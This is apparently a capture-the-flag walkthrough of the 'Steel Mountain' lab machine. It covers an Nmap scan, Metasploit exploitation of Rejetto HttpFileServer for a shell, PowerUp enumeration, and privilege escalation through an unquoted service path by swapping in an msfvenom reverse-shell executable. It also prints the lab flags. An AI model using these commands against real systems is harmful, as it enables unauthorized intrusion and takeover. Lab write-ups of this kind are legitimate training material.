BOOK THIS SPACE FOR AD
ARTICLE ADNmap
nmap -sC -sV <MACHINE-IP>PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-05-09T12:58:47
|_Not valid after: 2023-11-08T12:58:47
8080/tcp open http HttpFileServer httpd 2.3
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
=======================================================
=======================================================
1. Who is the employee of the month?
On Navigating to http://<Machine-IP>:80
On Inspecting the Page Source, we can found his name
Ans: Bill Harper=======================================================
=======================================================
1. Scan the machine with nmap. What is the other port running a web server on?
Ans: 80802. Take a look at the other web server. What file server is running?
We found that it is Http File Server but that’s not the answer
Ans: Rejetto Http File Server3. What is the CVE number to exploit this file server?
4. Use Metasploit to get an initial shell. What is the user flag?
Start metasploit and search for rejettosearch rejettouse 0
show options
Also, set the Port to 8080 using the Command set RPORT 8080
You will get the Meterpreter Shell
2. Let’s move to the bill’s Directory
cd C:\\Users\\bill\\3. Let’s Search for the User.txt using the command search -f user.txt
4. Cd into the Directory
cd C:\\Users\\bill\\Desktop\\cat user.txt
We Found the Flag
Ans: b04763b6fcf51fcd7c13abc7db4fd365=======================================================
=======================================================
1. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
Open a New Terminal and download the below Powershell Command Filewget https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps12. Now on the Metasploit type the below command to upload the file to the target machine (Make sure to enter your Download Location)
upload <FILE_LOCATION>load powershell
powershell_shell
3. Move to the Directory where you downloaded the Powershell file and then type the Following Commands
. .\PowerUp.ps1Invoke-AllChecksAns: AdvancedSystemCareService9
2. What is the root flag?
Let’s create a Payload using the below command
msfvenom -p windows/shell_reverse_tcp LHOST=<Machine-IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exesc stop AdvancedSystemCareService9upload Advanced.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Recieved Connection
Ans: 9af5f314f57607c00fd09803a587db80=======================================================
=======================================================
1. What powershell -c command could we run to manually find out the service name?
Format is “powershell -c “command here”*
Ans: powershell -c Get-Service